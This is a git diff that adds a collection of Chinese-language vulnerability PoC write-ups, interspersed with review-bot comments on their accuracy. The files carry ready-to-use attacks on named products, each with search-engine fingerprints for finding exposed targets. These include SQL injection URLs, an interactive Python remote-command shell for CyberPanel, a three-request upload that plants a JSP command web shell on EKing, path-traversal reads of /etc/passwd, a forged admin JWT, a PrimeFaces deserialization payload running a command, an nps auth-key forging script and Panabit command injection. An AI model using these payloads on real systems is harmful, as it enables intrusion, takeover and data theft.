b/ZoneMinder系统sort接口存在SQL注入漏洞.md new file mode 100644 index 0000000..b89aa1d 
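Review bot: in the Zkteco hunk the whole exploit is a pre-built `rememberMe` blob plus a `Cmd: whoami` header, so the gadget chain, the key and the header name the payload reads are all implicit; like the ZKBioSecurity file, it states a hard-coded shiro key without recording it, and without the key and the generating tool (only reachable through the attached LiquanKit.zip) nobody can rebuild the payload for a different command or write a detection. Also the fofa query ends in `&& region="Sichuan"`, which is the author's scoping filter rather than part of the product fingerprint; drop it from the fingerprint line.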
--- /dev/null +++ b/ZoneMinder系统sort接口存在SQL注入漏洞.md @@ -0,0 +1,14 @@ +# ZoneMinder系统sort接口存在SQL注入漏洞 + +ZoneMinder 是一款免费、开源的闭路电视软件应用程序,专为 Linux 开发,支持 IP、USB 和模拟摄像机。 + +## poc + +```java +http://host:port/zm/index.php?sort=**if(now()=sysdate()%2Csleep(6)%2C0)**&order=desc&limit=20&view=request&request=watch&mid=1 +``` + +```java +http://host:port/zm/index.php?limit=20&mid=-1%20OR%203*2*1=6%20AND%20000322=000322&order=desc&request=watch&sort=Id&view=request +``` + diff --git a/ZyxelNBG2105身份验证绕过.md b/ZyxelNBG2105身份验证绕过.md new file mode 100644 index 0000000..06f6626 --- /dev/null +++ b/ZyxelNBG2105身份验证绕过.md @@ -0,0 +1,27 @@ +# Zyxel NBG2105身份验证绕过 + +# 一、漏洞简介 +在Zyxel NBG2105 V1.00(AAGU.2)C0设备上,将登录cookie设置为1可提供管理员访问权限。 + +# 二、影响版本 ++ Zyxel NBG2105 + +# 三、资产测绘 ++ fofa`app="ZyXEL-NBG2105"` ++ 特征 + +![1696166434348-7921a2e3-c0d4-41ac-8c65-ea4a29f88c1b.png](./img/8b_DE99WV4FLOPh1/1696166434348-7921a2e3-c0d4-41ac-8c65-ea4a29f88c1b-935700.png) + +# 四、漏洞复现 +直接访问如下poc即可绕过身份验证进入后台 + +```plain +/login_ok.htm +``` + +![1696166524962-f85cc736-9d74-4e94-a204-90dfd7dc8829.png](./img/8b_DE99WV4FLOPh1/1696166524962-f85cc736-9d74-4e94-a204-90dfd7dc8829-508453.png) + + + +> 更新: 2024-02-29 23:57:14 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ofagy15qnxr8eg9f> \ No newline at end of file diff --git a/cyberpanel未授权远程命令执行漏洞.md b/cyberpanel未授权远程命令执行漏洞.md new file mode 100644 index 0000000..8371153 --- /dev/null +++ b/cyberpanel未授权远程命令执行漏洞.md 
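Review bot: in both ZoneMinder hunks the time-based payload is written `sort=**if(now()=sysdate()%2Csleep(6)%2C0)**` inside a code fence, where `**` is not rendered as bold and so becomes part of the query string; the literal asterisks would break the `sort` expression, so strip them. The two files (ZoneMinderindex and ZoneMinder系统sort接口) describe the same `index.php?sort=` injection; the second only adds a boolean payload in `mid=` (`-1 OR 3*2*1=6 AND 000322=000322`) and a one-line product description, so merging them into one file loses nothing.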
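Review bot: the Zyxel NBG2105 hunk describes the bypass as `将登录cookie设置为1可提供管理员访问权限`, but the `漏洞复现` step is simply `直接访问 /login_ok.htm` with no cookie set; either the description should name the cookie and show the request that sets it to 1, or the reproduction step should say that the page is reachable without any cookie. As written a reader cannot tell which of the two conditions is the actual flaw.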
@@ -0,0 +1,73 @@ +# cyberpanel未授权远程命令执行漏洞 + +​ CyberPanel是一个开源的Web控制面板,它提供了一个用户友好的界面,用于管理网站、电子邮件、数据库、FTP账户等。CyberPanel旨在简化网站管理任务,使非技术用户也能轻松管理自己的在线资源。 + +​ **CyberPanel upgrademysqlstatus 远程命令执行漏洞(QVD-2024-44346)**,该漏洞源于upgrademysqlstatus接口未做身份验证和参数过滤,未授权的攻击者可以通过此接口执行任意命令获取服务器权限,从而造成数据泄露、服务器被接管等严重的后果。 + +## 影响范围 + +CyberPanel v2.3.5 + +CyberPanel v2.3.6 + +## fofa + +```javascript +app="CyberPanel" +``` + +## poc + +```javascript +OPTIONS /dataBases/upgrademysqlstatus HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 +Content-Type: application/json +Connection: close + +{"statusfile":"/dev/null; id; #"} +``` + +```python +import httpx +import sys + +def get_CSRF_token(client): + resp = client.get("/") + + return resp.cookies['csrftoken'] + +def pwn(client, CSRF_token, cmd): + headers = { + "X-CSRFToken": CSRF_token, + "Content-Type":"application/json", + "Referer": str(client.base_url) + } + + payload = '{"statusfile":"/dev/null; %s; #","csrftoken":"%s"}' % (cmd, CSRF_token) + + return client.put("/dataBases/upgrademysqlstatus", headers=headers, data=payload).json()["requestStatus"] + +def exploit(client, cmd): + CSRF_token = get_CSRF_token(client) + stdout = pwn(client, CSRF_token, cmd) + print(stdout) + +if __name__ == "__main__": + target = sys.argv[1] + + client = httpx.Client(base_url=target, verify=False) + while True: + cmd = input("$> ") + + exploit(client, cmd) +``` + +![image-20241029095124852](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410290951933.png) + +![image-20241029095144766](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410290951820.png) + +## 漏洞来源 + +- https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce +- https://mp.weixin.qq.com/s/sUARVHbwH1UZDXB-CF2z1w \ No newline at end of file diff --git a/eking管理易Html5Upload接口存在任意文件上传漏洞.md b/eking管理易Html5Upload接口存在任意文件上传漏洞.md new file mode 100644 index 0000000..5e7e7d6 
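Review bot: in the cyberpanel hunk the raw PoC sends `OPTIONS /dataBases/upgrademysqlstatus` with no CSRF token, while the Python script fetches `csrftoken` from `/` and sends a `PUT` with `X-CSRFToken`; the file never says why both work, although the choice of method is what the referenced writeup ("what are my options") is about, so one sentence on why `OPTIONS` needs no token while `PUT` does would make the PoC understandable. In the script, `resp.cookies['csrftoken']` raises `KeyError` when the landing page sets no cookie, and `.json()["requestStatus"]` raises on any non-JSON error page; a short check with a clear message would help when the target is patched.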
--- /dev/null +++ b/eking管理易Html5Upload接口存在任意文件上传漏洞.md 
@@ -0,0 +1,68 @@ +# eking管理易Html5Upload接口存在任意文件上传漏洞 + +eking管理易Html5Upload接口存在任意文件上传漏洞,未经身份验证的远程攻击者可利用此漏洞上传任意文件,在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 + +## fofa + +```yaml +app="EKing-管理易" +``` + +## poc + +创建临时文件 + +```yaml +POST /Html5Upload.ihtm HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Connection: close + +comm_type=INIT&sign_id=shell&vp_type=default&file_name=../../shell.jsp&file_size=2048 +``` + +写入文件内容 + +```jinja2 +POST /Html5Upload.ihtm HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR +Connection: close + +------WebKitFormBoundaryj7OlOPiiukkdktZR +Content-Disposition: form-data; name="comm_type" + +DATA +------WebKitFormBoundaryj7OlOPiiukkdktZR +Content-Disposition: form-data; name="sign_id" + +shell +------WebKitFormBoundaryj7OlOPiiukkdktZR +Content-Disposition: form-data; name="data_inde" + +0 +------WebKitFormBoundaryj7OlOPiiukkdktZR +Content-Disposition: form-data; name="data"; filename="chunk1" +Content-Type: application/octet-stream + +<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print("</pre>");new java.io.File(application.getRealPath(request.getServletPath())).delete();%> +------WebKitFormBoundaryj7OlOPiiukkdktZR-- +``` + +保存文件 + +```javascript +POST /Html5Upload.ihtm HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Connection: close + +comm_type=END&sign_id=shell&file_name=../../shell.jsp +``` + 
+![image-20241012132747292](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121327356.png) + +![image-20241012132754554](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121327613.png) \ No newline at end of file diff --git a/elgg-sqli.md b/elgg-sqli.md new file mode 100644 index 0000000..115768c --- /dev/null +++ b/elgg-sqli.md @@ -0,0 +1,14 @@ +## Elgg 5.1.4 Sql Injection + +## fofa +``` +icon_hash="413602919" +``` +## poc +``` +GET /members?sort_by%5Bproperty%5D=name&sort_by%5Bproperty_type%5D=metadata&sort_by%5Bdirection%5D=desc%2c(select*from(select(sleep(6)))a) HTTP/1.1 +Host: +``` + +## Ref +- https://github.com/4rdr/proofs/blob/main/info/Elgg_unauth_SQLi_5.1.4.md \ No newline at end of file diff --git a/hi-bridge网关download存在文件读取漏洞.md b/hi-bridge网关download存在文件读取漏洞.md new file mode 100644 index 0000000..4dd2106 --- /dev/null +++ b/hi-bridge网关download存在文件读取漏洞.md @@ -0,0 +1,31 @@ +# hi-bridge网关download存在文件读取漏洞 + +# 一、漏洞简介 +hi-bridge网关download存在文件读取漏洞 + +# 二、影响版本 ++ hi-bridge网关 + +# 三、资产测绘 +```plain +title="HA Bridge" +``` + +![1716312169799-4fd5856c-56e1-426d-a253-9230ae522398.png](./img/qezHCxCNYkbHMxcn/1716312169799-4fd5856c-56e1-426d-a253-9230ae522398-746647.png) + +# 四、漏洞复现 +```plain +PUT /api/devices/backup/download HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 + + +{"filename":"../../../../etc/passwd"} +``` + +![1716312291501-52489ea0-9fd1-4509-bf55-917a14eaf026.png](./img/qezHCxCNYkbHMxcn/1716312291501-52489ea0-9fd1-4509-bf55-917a14eaf026-796584.png) + + + +> 更新: 2024-05-23 12:38:07 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/aat3gchwm23g4rhd> \ No newline at end of file diff --git a/iDocView-upload接口任意文件读取.md b/iDocView-upload接口任意文件读取.md new file mode 100644 index 0000000..2d63cba --- /dev/null +++ b/iDocView-upload接口任意文件读取.md 
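Review bot: in the eking Html5Upload hunk the second request has a form field named `data_inde`; every other field (`comm_type`, `sign_id`, `file_name`, `file_size`) is a full word, so `data_inde` looks truncated and should be checked against a captured request, since a wrong field name makes the chunk upload fail silently. Also the INIT and END steps both pass `file_name=../../shell.jsp` but the file never says where the shell lands or which URL to request afterwards, and the JSP deletes itself on first execution (`new java.io.File(...).delete()`), which is worth stating so the reader does not re-upload thinking the first attempt failed.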
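Review bot: the hi-bridge hunk names the product `hi-bridge网关` in the filename, title and summary while its only fingerprint is `title="HA Bridge"`, so the name and the fingerprint disagree; use the name the fingerprint actually matches. The `PUT /api/devices/backup/download` request also carries a JSON body (`{"filename":"../../../../etc/passwd"}`) with no `Content-Type: application/json` header, which some frameworks reject, so add the header to the raw request.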
@@ -0,0 +1,18 @@ +## iDocView upload接口任意文件读取 + iDocView是一个在线文档预览系统 /doc/upload 接口处存在任意文件读取漏洞,未授权的攻击者可以利用此接口并携带默认token读取服务器敏感文件信息,使系统处于极度不安全的状态。 + +## 资产测绘 +``` +Hunter语法: +app.name="I Doc View" +Fofa语法: +title="I Doc View" +``` + +## poc +``` +http://xxxxxx/doc/upload?token=testtoken&url=file:///C:/windows/win.ini&name=test.txt +``` +![image](https://github.com/wy876/POC/assets/139549762/01f5a3a7-9cd3-45bc-beb0-5cd6ab800171) + +![image](https://github.com/wy876/POC/assets/139549762/0e549cdd-9c98-41b5-874d-8a159cf3db19) diff --git a/iKuai流控路由SQL注入漏洞.md b/iKuai流控路由SQL注入漏洞.md new file mode 100644 index 0000000..1ee4c70 --- /dev/null +++ b/iKuai流控路由SQL注入漏洞.md @@ -0,0 +1,28 @@ +# iKuai 流控路由 SQL注入漏洞 + +# 一、漏洞简介 +iKuai 流控路由 存在SQL注入漏洞,可以通过SQL注入漏洞构造万能密码获取路由器后台管理权限。 + +# 二、影响版本 ++ iKuai 流控路由 + +# 三、资产测绘 ++ fofa`title="登录爱快流控路由"` ++ 特征 + +![1708141838923-2e73c81d-9305-4108-a974-55314dbcd36f.png](./img/YBuf94WmdVDpk4Za/1708141838923-2e73c81d-9305-4108-a974-55314dbcd36f-143487.png) + +# 四、漏洞复现 +使用万能密码登陆系统 + +```java +user: "or""=""or""=" +pass: 空 +``` + +![1708141888537-0e90ab4f-9fcc-4f83-9bb5-3b00d2207213.png](./img/YBuf94WmdVDpk4Za/1708141888537-0e90ab4f-9fcc-4f83-9bb5-3b00d2207213-683464.png) + + + +> 更新: 2024-02-29 23:57:11 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kx86t3hwzf40pktl> \ No newline at end of file diff --git a/imo云办公室接口Imo_DownLoadUI.php任意文件下载漏洞.md b/imo云办公室接口Imo_DownLoadUI.php任意文件下载漏洞.md new file mode 100644 index 0000000..e294678 --- /dev/null +++ b/imo云办公室接口Imo_DownLoadUI.php任意文件下载漏洞.md 
@@ -0,0 +1,24 @@ +# imo云办公室接口Imo_DownLoadUI.php任意文件下载漏洞 + +imo云办公室由于 /file/Placard/upload/Imo_DownLoadUI.php 页面 filename 参数过滤不严,导致可以读取系统敏感文件 + +## fofa + +```javascript +app="IMO-云办公室" +``` + +## poc + +```javascript +GET /file/Placard/upload/Imo_DownLoadUI.php?cid=1&uid=1&type=1&filename=/OpenPlatform/config/kdBind.php HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive +Host: +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 +``` + +![imo 云办公室 Imo_DownLoadUI.php 任意文件下载漏洞](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409111031851.png) \ No newline at end of file diff --git a/laravel开启debug模式信息泄露漏洞.md b/laravel开启debug模式信息泄露漏洞.md new file mode 100644 index 0000000..01acf10 --- /dev/null +++ b/laravel开启debug模式信息泄露漏洞.md 
@@ -0,0 +1,30 @@ +# laravel开启debug模式信息泄露漏洞 + +# 一、漏洞简介 +<font style="color:rgba(0, 0, 0, 0.9);">laravel因配置不当会泄露MySQL,Redis,Elastic,Mongodb,neo4j,postgresql,SQLServer,Oracle,Firebird,sqlite,mail账号密码和APP</font><font style="color:rgb(215, 186, 125);">\_</font><font style="color:rgba(0, 0, 0, 0.9);">KEY等敏感信息。黑客可以利用这些信息进行脱库,或者在服务器植入后门,也可以利用数据库服务器进行跳板入侵内网其他重要服务器。</font> + +# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font> ++ <font style="color:rgba(0, 0, 0, 0.9);">laravel</font> + +# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font> ++ hunter`app.name=="Laravel Default Page"` ++ 特征 + +![1706028497800-b50dcfba-e08c-49ee-889a-d5366a7c5da2.png](./img/P88NvAGGM0PZp2co/1706028497800-b50dcfba-e08c-49ee-889a-d5366a7c5da2-494849.png) + +# 四、漏洞复现 +```plain +PUT /index.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 +Connection: close +Accept-Encoding: gzip, deflate +Content-Length: 0 +``` + +![1706028548504-9391ce93-a3e2-469c-b68a-430122c7597f.png](./img/P88NvAGGM0PZp2co/1706028548504-9391ce93-a3e2-469c-b68a-430122c7597f-688243.png) + + + +> 更新: 2024-02-29 23:57:33 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tgvd9mmhbtzgbv2k> \ No newline at end of file diff --git a/linglong扫描系统存在JWT密钥硬编码登录绕过漏洞.md b/linglong扫描系统存在JWT密钥硬编码登录绕过漏洞.md new file mode 100644 index 0000000..fba63b9 --- /dev/null +++ b/linglong扫描系统存在JWT密钥硬编码登录绕过漏洞.md 
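Review bot: the laravel hunk relies on an unsupported method (`PUT /index.php` with `Content-Length: 0`) to provoke the debug error page, but the body never states that the leak exists only with debug mode enabled (it is only in the title) or what to look for in the response (the `APP_KEY` and database variables named in the summary). Also the hunter fingerprint `app.name=="Laravel Default Page"` only finds sites still showing the default landing page, while any Laravel application with debug enabled has the same exposure; say that the fingerprint is a convenience, not the affected set.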
@@ -0,0 +1,46 @@ +# linglong扫描系统存在JWT密钥硬编码登录绕过漏洞 + +# 一、漏洞简介 +linglong扫描系统 存在密钥硬编码漏洞,未经身份验证验证得攻击者可构造JWT密钥绕着身份认证直接登录系统后台,造成信息泄露,使系统处于极不安全的状态。 + +# 二、影响版本 ++ linglong扫描系统 + +# 三、资产测绘 ++ fofa`icon_hash="684115083"` ++ 特征![1715938593763-5eb42a99-7424-48f3-9a08-2a19f8d41a80.png](./img/TdJAfNn7rXunQrWH/1715938593763-5eb42a99-7424-48f3-9a08-2a19f8d41a80-600755.png) + +# 四、漏洞复现 +1、登陆时抓包 + +![1715938889113-723830d7-8a12-4e5b-b91e-6543f792e612.jpeg](./img/TdJAfNn7rXunQrWH/1715938889113-723830d7-8a12-4e5b-b91e-6543f792e612-800818.jpeg) + +2、拦截返回包 + +![1715938893647-287318dd-1f8b-4da2-81a3-7ee9b1bcd887.jpeg](./img/TdJAfNn7rXunQrWH/1715938893647-287318dd-1f8b-4da2-81a3-7ee9b1bcd887-481183.jpeg) + +3、替换返回包为如下内容: + +![1715938907183-713ef226-8b05-487e-a848-14919f3f7be4.jpeg](./img/TdJAfNn7rXunQrWH/1715938907183-713ef226-8b05-487e-a848-14919f3f7be4-695767.jpeg) + +```plain +HTTP/1.1 200 OK +Access-Control-Allow-Credentials: true +Access-Control-Allow-Headers: Content-Type,AccessToken,X-CSRF-Token, Authorization,Token,X-TOKEN +Access-Control-Allow-Methods: POST, GET,PUT, DELETE, OPTIONS +Access-Control-Allow-Origin: * +Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-Type +Content-Type: application/json; charset=utf-8 +Date: Fri, 17 May 2024 09:39:26 GMT +Content-Length: 43 +Connection: close + +{"code":200,"data":{"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiIxIiwiZXhwIjoxOTk5OTk5OTk5LCJpc3MiOiJsaW5nbG9uZyJ9.xAJf-cktK9WD5vXpfwTaIs6fSqVGZfG5BGnqDZwruMY"},"msg":"请求失败"} +``` + +![1715938718868-db511db4-0fa4-4453-b8a0-37ae18e96300.png](./img/TdJAfNn7rXunQrWH/1715938718868-db511db4-0fa4-4453-b8a0-37ae18e96300-390634.png) + + + +> 更新: 2024-05-18 12:32:23 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pb37q4h4d15zfwg1> \ No newline at end of file 
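Review bot: in the linglong hunk the title says the JWT secret is hard-coded, but the secret itself is never written down; the reproduction just pastes a finished token (`eyJhbGciOiJIUzI1NiIs...`, HS256, payload `{"username":"admin","password":"1","exp":1999999999,"iss":"linglong"}`) into an intercepted login response, so a reader can neither verify the key nor mint a token with different claims once `exp` passes; record the key or the command used to sign the token. The substituted response also pairs `"code":200` with `"msg":"请求失败"` (request failed); confirm whether the client ignores `msg` or whether this is a paste error.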
diff --git a/maxViewStorageManager系统dynamiccontent.properties.xhtml远程代码执行漏洞.md b/maxViewStorageManager系统dynamiccontent.properties.xhtml远程代码执行漏洞.md new file mode 100644 index 0000000..67974e0 --- /dev/null +++ b/maxViewStorageManager系统dynamiccontent.properties.xhtml远程代码执行漏洞.md 
@@ -0,0 +1,32 @@ +# maxView Storage Manager 系统 dynamiccontent.properties.xhtml 远程代码执行漏洞 + +# 一、漏洞简介 +maxView Storage Manager 是一款企业存储和通信解决方案的管理系统。maxView Storage Manager 存在代码执行漏洞,攻击者可通过 dynamiccontent.properties.xhtml 执行任意代码获取服务器权限。 + +# 二、影响版本 ++ maxView Storage Manager 系统 + +# 三、特征 ++ fofa`title="maxView Storage Manager -Login"` ++ 特征 + +![1711170206968-8730e701-b28e-4f8c-b76e-7ec656da2137.png](./img/AaQLbnI0UgxJhLrz/1711170206968-8730e701-b28e-4f8c-b76e-7ec656da2137-269947.png) + +# 四、漏洞复现 +```plain +POST /maxview/manager/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip +Connection: close +  +pfdrt=sc&ln=primefaces&pfdrid=4xE5s8AClZxUxmyaZjpBstMXUalIgOJHOtvxel%2Fv4YXvibdOn52ow4M6lDaKd9Gb8JdQqbACZNWVZpVS%2B3sX1Hoizouty1mYYT4yJsKPnUZ0LUHDvN0GB5YLgX1PkNY%2B1ZQ%2FnOSg5J1LDyzAjBheAxLDODIVcHkmJ6hnJsQ0YQ8bMU5%2B%2BTqeD4BGqCZMDjP%2BZQvveiUhxsUC%2F%2BtPqnOgFSBV8TBjDSPNmVoQ9YcKTGelKuJjS2kCXHjcyz7PcQksSW6UUmKu9RhJ%2Bx3Mnx6j56eroVPWnM2vdYRt5An6cLo1YPXu9uqriyg1wgm%2F7xYP%2FUwP1q8wfVeyM4fOw2xJzP6i1q4VLHLXi0VYHAIgaPrZ8gH8XH4X2Kq6ewyrJ62QxBF5dtE3tvLAL5tpGxqek5VW%2BhZFe9ePu0n5tLxWmqgqni8bKGbGrGu4IhXhCJhBxyelLQzPGLCfqmiQwYX5Ime9EHj1k5eoWQzH8jb3kQfFJ0exVprGCfXKGfHyfKfLEOd86anNsiQeNavNL7cDKV0yMbz52n6WLQrCAyzulE8kBCZPNGIUJh24npbeaHTaCjHRDtI7aIPHAIhuMWn7Ef5TU9DcXjdJvZqrItJoCDrtxMFfDhb0hpNQ2ise%2BbYIYzUDkUtdRV%2BjCGNI9kbPG5QPhAqp%2FJBhQ%2BXsqIhsu4LfkGbt51STsbVQZvoNaNyukOBL5IDTfNY6wS5bPSOKGuFjsQq0Xoadx1t3fc1YA9pm%2FEWgyR5DdKtmmxG93QqNhZf2RlPRJ5Z3jQAtdxw%2BxBgj6mLY2bEJUZn4R75UWnvLO6JM918jHdfPZELAxOCrzk5MNuoNxsWreDM7e2GX2iTUpfzNILoGaBY5wDnRw46ATxhx6Q%2FEba5MU7vNX1VtGFfHd2cDM5cpSGOlmOMl8qzxYk1R%2BA2eBUMEl8tFa55uwr19mW9VvWatD8orEb1RmByeIFyUeq6xLszczsB5Sy85Y1KPNvjmbTKu0LryGUc3U8VQ7AudToBsIo9ofMUJAwELNASNfLV0fZvUWi0GjoonpBq5jqSrRHuERB1%2BDW2kR6XmnuDdZMt9xdd1BGi1AM3As0KwSet
Nq6Ezm2fnjpW877buqsB%2BczxMtn6Yt6l88NRYaMHrwuY7s4IMNEBEazc0IBUNF30PH%2B3eIqRZdkimo980HBzVW4SXHnCMST65%2FTaIcy6%2FOXQqNjpMh7DDEQIvDjnMYMyBILCOCSDS4T3JQzgc%2BVhgT97imje%2FKWibF70yMQesNzOCEkaZbKoHz498sqKIDRIHiVEhTZlwdP29sUwt1uqNEV%2F35yQ%2BO8DLt0b%2BjqBECHJzI1IhGvSUWJW37TAgUEnJWpjI9R1hT88614GsVDG0UYv0u8YyS0chh0RryV3BXotoSkSkVGShIT4h0s51Qjswp0luewLtNuVyC5FvHvWiHLzbAArNnmM7k%2FGdCn3jLe9PeJp7yqDzzBBMN9kymtJdlm7c5XnlOv%2BP7wIJbP0i4%2BQF%2BPXw5ePKwSwQ9v8rTQ%3D%3D&cmd=ipconfig +``` + +![1711170266996-7fc35e2e-adcf-4ef6-9055-ce2d8ca62b39.png](./img/AaQLbnI0UgxJhLrz/1711170266996-7fc35e2e-adcf-4ef6-9055-ce2d8ca62b39-666053.png) + + + +> 更新: 2024-04-16 16:53:12 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/oqknqwns4swn7n8n> \ No newline at end of file diff --git a/npsauth_key未授权访问漏洞.md b/npsauth_key未授权访问漏洞.md new file mode 100644 index 0000000..d8af95a --- /dev/null +++ b/npsauth_key未授权访问漏洞.md 
@@ -0,0 +1,59 @@ +# nps auth_key未授权访问漏洞 + +# 一、漏洞简介 +nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。其中auth_key 存在未授权访问漏洞,当 nps.conf 中的 auth_key 未配置时攻击者通过生成特定的请求包可以获取服务器后台权限。 + +# 二、影响版本 ++ nps + +# 三、资产测绘 +hunter:`app.name=="NPS"` + +![1690905321342-d3f07968-0b21-4f33-9fdc-6e0aadc8ac40.png](./img/ZDr_BBe5Bm_qQnLI/1690905321342-d3f07968-0b21-4f33-9fdc-6e0aadc8ac40-275845.png) + +登陆页面: + +![1690905349347-b1e10017-8bea-4fb1-94d8-7a5278399643.png](./img/ZDr_BBe5Bm_qQnLI/1690905349347-b1e10017-8bea-4fb1-94d8-7a5278399643-811855.png) + +# 四、漏洞复现 +nps认证方式是通过配置文件nps.conf中的auth_key与timestamp的md5形式进行认证,但在默认的配置文件中,auth_key 默认被注释,所以只需要可以获取到的参数 timestamp 就可以绕过认证登录。 + +```java +import time +import hashlib +now = time.time() +m = hashlib.md5() +m.update(str(int(now)).encode("utf8")) +auth_key = m.hexdigest() + +print("Index/Index?auth_key=%s×tamp=%s" % (auth_key,int(now))) +``` + +![1690906026443-b70fe018-f2d0-4d67-bb7f-5a4e2bd3da2a.png](./img/ZDr_BBe5Bm_qQnLI/1690906026443-b70fe018-f2d0-4d67-bb7f-5a4e2bd3da2a-278432.png) + +成功绕过进入后台 + +![1690906058460-277b73fc-8982-41f6-85d4-c592b09b36ed.png](./img/ZDr_BBe5Bm_qQnLI/1690906058460-277b73fc-8982-41f6-85d4-c592b09b36ed-607784.png) + +NPS存在一个身份验证的缺陷,无需登录,直接进后台,后台功能点全都可以用。具体利用是伪造两个参数auth_key、timestamp。由于参数的生命周期只有20秒,20秒过后就需要重新伪造,故采用burp插件。 + +插件所有的功能集成到了Burp的右键中: + +1、首先访问nps站点,拦截请求包,启用插件 + +![1690906445748-6ff0e472-4657-46e8-b19f-3377b92716b1.png](./img/ZDr_BBe5Bm_qQnLI/1690906445748-6ff0e472-4657-46e8-b19f-3377b92716b1-763743.png) + +![1690906483905-89f648c9-f7d9-41d1-ac1a-2c4b5936d37f.png](./img/ZDr_BBe5Bm_qQnLI/1690906483905-89f648c9-f7d9-41d1-ac1a-2c4b5936d37f-940880.png) + +2、点击“查看仪表盘”会修改请求包,之后直接放行数据包成功登陆后台,后续每一个请求都会自动贴上身份验证参数。 + +![1690906698049-f5763516-c353-4ed2-b6fb-ec146d5308c7.png](./img/ZDr_BBe5Bm_qQnLI/1690906698049-f5763516-c353-4ed2-b6fb-ec146d5308c7-679499.png) + 
+![1690906762480-40576cdf-6b8b-4bdb-9def-d9e6f5e63ff1.png](./img/ZDr_BBe5Bm_qQnLI/1690906762480-40576cdf-6b8b-4bdb-9def-d9e6f5e63ff1-086832.png) + + + + + +> 更新: 2024-02-29 23:57:16 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pxqopzr7q1gwysu2> \ No newline at end of file diff --git a/omfyUI-follow_symlinks文件读取漏洞.md b/omfyUI-follow_symlinks文件读取漏洞.md new file mode 100644 index 0000000..af5da6a --- /dev/null +++ b/omfyUI-follow_symlinks文件读取漏洞.md @@ -0,0 +1,11 @@ +## omfyUI follow_symlinks文件读取漏洞 + +## fofa +``` +app="ComfyUI" +``` + +## poc +``` +http://ip:8188/../../../../../../../../../../../../../../etc/passwd +``` diff --git a/panabit日志审计系统mailcious_down_fornode远程命令执行漏洞.md b/panabit日志审计系统mailcious_down_fornode远程命令执行漏洞.md new file mode 100644 index 0000000..c09d55b --- /dev/null +++ b/panabit日志审计系统mailcious_down_fornode远程命令执行漏洞.md 
@@ -0,0 +1,49 @@ +# panabit日志审计系统mailcious_down_fornode远程命令执行漏洞 + +# 一、漏洞简介 +panalog为北京派网软件有限公司,一款流量分析,日志分析管理的一款软件。panabit日志审计系统mailcious_down_fornode远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ Panabit panalog + +# 三、资产测绘 ++ hunter`app.name="Panabit 日志系统"` ++ 特征 + +![1699191878681-4fe56d76-6ee5-4a90-af37-1cf8a983f57f.png](./img/PDxyT-yAQSiNXykj/1699191878681-4fe56d76-6ee5-4a90-af37-1cf8a983f57f-247645.png) + +# 四、漏洞复现 +```java +POST /mailcious_down_fornode.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 +Content-Length: 40 +Accept-Encoding: gzip, deflate +Connection: close +Content-Type: application/x-www-form-urlencoded +X-Forwarded-For: 127.0.0.1,192.168.170.105,172.10.107.143 + +action=check&uuid=;whoami > 